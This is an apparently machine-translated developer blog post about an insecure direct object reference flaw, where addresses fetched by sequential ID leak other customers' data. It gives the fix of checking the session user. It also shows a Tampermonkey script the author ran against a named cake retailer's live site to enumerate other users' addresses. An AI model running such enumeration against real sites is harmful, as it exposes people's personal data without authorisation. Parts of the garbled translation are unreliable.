Last year, the company took a large sheet of nanshan, because the project is not completely similar reference must depend on oneself fumble, then is to do a version of the feeling not to adjust, and modify, then new features to be developed, not busy at that time a person come over, very headache, shanzhai for more convenient work just camped out at clients, development and discuss solutions, I came home at midnight every day. However, due to the development of new functions, the old layout is also being adjusted, and then there are some bugs to be fixed. The workload of one person is too much, while the client requires fast progress, so many details are ignored, but also hidden security risks. The work lasted about three months, and finally the development was finished. I was very happy in my heart, and finally a project was finished. But also at this time, the customer to find a professional tester, specialized test system vulnerabilities, before the root of the curse will appear, find 7, 8 vulnerabilities, including online payment, customer information security, etc..
For example, how is customer information insecure
Use SQL when querying user information
Select top 1 * from addr where id= address IDCopy the codeUnder normal circumstances, this is definitely no problem, the user’s address ID is unique. However, if a user modifies an ID casually in a Get request under a Web site, the information of other customers may be obtained, and the information of other customers may be seriously disclosed.
For example, if the web address get is /user/deliveryAddress/55, the user enters /user/deliveryAddress/56
The correct way to do this is to get the user ID from the current logged session and compare the user ID with the address ID.
Select top 1 * from addr where id= address id and userid= useridCopy the codeMake sure the information for this address is for the current user
Is it just me? It’s not
A few days ago, it was revealed that a cake was not made fresh on that day, and the internal management was in a mess. In fact, I also bought a cake at their home before, so I was curious and went to their official website to have a look. I accidentally found that when the user modified the address information, the user also obtained the information in the same way as I did before /user/deliveryAddress/ ID.
As an IT, I made this mistake before. Out of curiosity, I randomly modified an address ID. As expected, the address information was changed and I saw the information of other users. Later, to verify, I wrote a loop on tamperMonkey
// ==UserScript== // @name XFXB // @namespace http://tampermonkey.net/ // @version 0.1 // @description try to take over the world! / / @ the author You / / @ match https://www.xfxb.net/ * / / / / @ @ the require http://code.jquery.com/jquery-1.11.0.min.js grant none // ==/UserScript== (function() { 'use strict'; for(var i=1000; i<1005; i++){ $.get("/user/deliveryAddress/"+i, function(result){ console.log(result); }); } // Your code here... }) ();Copy the codeThe following information appears
It’s easy to get access to other users’ addresses, and it looks like everyone else is making the same mistake.
@it of a cake website, your bug needs to be fixed
Keep track of the potholes in the hope that others may tread fewer of the same potholes, and find solutions here in CNBLOGS